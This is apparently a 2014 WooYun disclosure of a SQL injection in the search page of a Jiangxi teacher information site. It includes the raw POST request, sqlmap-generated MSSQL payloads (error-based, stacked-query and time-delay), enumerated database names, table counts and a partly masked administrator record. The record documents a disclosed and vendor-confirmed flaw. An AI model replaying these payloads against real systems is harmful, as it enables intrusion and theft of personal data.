当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049508

漏洞标题:某市教师信息管理系统SQL注入

相关厂商:江西教师教育网

漏洞作者: m_vptr

提交时间:2014-01-22 11:50

修复时间:2014-03-08 11:51

公开时间:2014-03-08 11:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-22: 细节已通知厂商并且等待厂商处理中
2014-01-27: 厂商已经确认,细节仅向厂商公开
2014-02-06: 细节向核心白帽子及相关领域专家公开
2014-02-16: 细节向普通白帽子公开
2014-02-26: 细节向实习白帽子公开
2014-03-08: 细节向公众公开

简要描述:

sql注入,涉及40+w用户数据。还好身份证、邮箱、手机都是加密过的。

详细说明:

注入点: http://www.jxjsjy.com/search/
该搜索页没有对post参数txtKeyword进行过滤
post请求:

POST /search/ HTTP/1.1
Host: www.jxjsjy.com
Proxy-Connection: keep-alive
Content-Length: 601
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.jxjsjy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.jxjsjy.com/search/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: ASP.NET_SessionId=iy0biq24x2bdjee4fs1jdmvp; arp_scroll_position=0
__VIEWSTATE=%2FwEPDwUJNDgwNDI3NjI4D2QWAgIDD2QWBAIHDw8WAh4EVGV4dAVB6K%2B356Gu6K6k5pON5L2c5piv5ZCm5q2j56Gu77yB6ZSZ6K%2BvOidBJyDpmYTov5HmnInor63ms5XplJnor6%2FjgIJkZAIJDzwrABEDAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkARAWABYAFgAMFCsAAGQYAQUJZ3ZUZWFjaGVyDzwrAAwBCGZk6OhQAJvweO2gfXpjxNQ0W99XLhCbndcYJDjUG7GkkfQ%3D&__EVENTVALIDATION=%2FwEdAAdrRZJq1mAsiUV%2F8f%2B3RITDPYhyekUWnTkkNjRCzj%2B13syRwqaaMbxXVBTc8MQF49fKA14KXQyGcaU%2Bic2XSmnAVhW2Dx14E2vTrCPjioKTT7rZiRCqc8WDJESCLLHi21qO1N1XNFmfsMXJasjxX85j3rIagTYyw3%2FE9DL6U44O05APfTWv0HlOLV5BlIVfbak%3D&ddlSearchType=1&txtKeyword=1&btnSearch=%E6%9F%A5%E6%89%BE


sqlmap扫描报告

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtKeyword
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNDgwNDI3NjI4D2QWAgIDD2QWBAIHDw8WAh4EVGV4dAUq5b+F6aG76L6T5YWl5Lik5Liq5a2X56ym5Lul5LiK5omN6IO95p+l6K+iZGQCCQ88KwARAwAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZAEQFgAWABYADBQrAABkGAEFCWd2VGVhY2hlcg88KwAMAQhmZKzUuf9repKYASGO2Vqf6Var8hakqrngdApNlREArmLC&__EVENTVALIDATION=/wEdAAeI+ePgNPDTFYvogyyzcRLsPYhyekUWnTkkNjRCzj+13syRwqaaMbxXVBTc8MQF49fKA14KXQyGcaU+ic2XSmnAVhW2Dx14E2vTrCPjioKTT7rZiRCqc8WDJESCLLHi21qO1N1XNFmfsMXJasjxX85jIc/dwR9HUQLugKFQrfvbq8TRWHA9jvM8y2HoSFxWGGQ=&ddlSearchType=1&txtKeyword=1%' AND 6963=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(120)+CHAR(101)+CHAR(113)+(SELECT (CASE WHEN (6963=6963) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(113)+CHAR(101)+CHAR(113))) AND '%'='&btnSearch=%E6%9F%A5%E6%89%BE
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJNDgwNDI3NjI4D2QWAgIDD2QWBAIHDw8WAh4EVGV4dAUq5b+F6aG76L6T5YWl5Lik5Liq5a2X56ym5Lul5LiK5omN6IO95p+l6K+iZGQCCQ88KwARAwAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZAEQFgAWABYADBQrAABkGAEFCWd2VGVhY2hlcg88KwAMAQhmZKzUuf9repKYASGO2Vqf6Var8hakqrngdApNlREArmLC&__EVENTVALIDATION=/wEdAAeI+ePgNPDTFYvogyyzcRLsPYhyekUWnTkkNjRCzj+13syRwqaaMbxXVBTc8MQF49fKA14KXQyGcaU+ic2XSmnAVhW2Dx14E2vTrCPjioKTT7rZiRCqc8WDJESCLLHi21qO1N1XNFmfsMXJasjxX85jIc/dwR9HUQLugKFQrfvbq8TRWHA9jvM8y2HoSFxWGGQ=&ddlSearchType=1&txtKeyword=1%'; WAITFOR DELAY '0:0:5'--&btnSearch=%E6%9F%A5%E6%89%BE
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJNDgwNDI3NjI4D2QWAgIDD2QWBAIHDw8WAh4EVGV4dAUq5b+F6aG76L6T5YWl5Lik5Liq5a2X56ym5Lul5LiK5omN6IO95p+l6K+iZGQCCQ88KwARAwAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZAEQFgAWABYADBQrAABkGAEFCWd2VGVhY2hlcg88KwAMAQhmZKzUuf9repKYASGO2Vqf6Var8hakqrngdApNlREArmLC&__EVENTVALIDATION=/wEdAAeI+ePgNPDTFYvogyyzcRLsPYhyekUWnTkkNjRCzj+13syRwqaaMbxXVBTc8MQF49fKA14KXQyGcaU+ic2XSmnAVhW2Dx14E2vTrCPjioKTT7rZiRCqc8WDJESCLLHi21qO1N1XNFmfsMXJasjxX85jIc/dwR9HUQLugKFQrfvbq8TRWHA9jvM8y2HoSFxWGGQ=&ddlSearchType=1&txtKeyword=1%' WAITFOR DELAY '0:0:5'--&btnSearch=%E6%9F%A5%E6%89%BE
---

漏洞证明:

available databases [7]:

[*] jxteacher2012_20130606
[*] jxteacher20130606
[*] master
[*] model
[*] msdb
[*] tempdb
[*] TIMS20120615


116个表,就贴首尾中间几个吧
Database: TIMS20120615

| dbo.tmp_train_users                      | 1466137 |
| dbo.User_Admins | 7148 |
| dbo.vw_aspnet_Applications | 1 |


测试User_Admins数据

AdminID,ColumnId,UserTypeId,QQ,TName,Email,Address,UserName,Postcode,IsDelete,LastEditBy,ColumnPath,OfficePhone,MobilePhone,LastEditDate,WorkDepartment
00017C9D-CEE5-47DD-8C41-2D02F561F4A9,NULL,NULL,xxx,**来,xxx,<blank>,xxx,xxx,0,00017C9D-CEE5-47DD-8C41-2D02F561F4A9,NULL,<blank>,<blank>,06 30 2011 1:49PM,河***

修复方案:

过滤

版权声明:转载请注明来源 m_vptr@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-01-27 09:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江西分中心处置。涉及用户信息泄露风险,rank 13

最新状态:

暂无


漏洞评价:

评论

  1. 2014-02-08 22:56 | m_vptr ( 普通白帽子 | Rank:133 漏洞数:30 | 新手)

    不是某市,是某省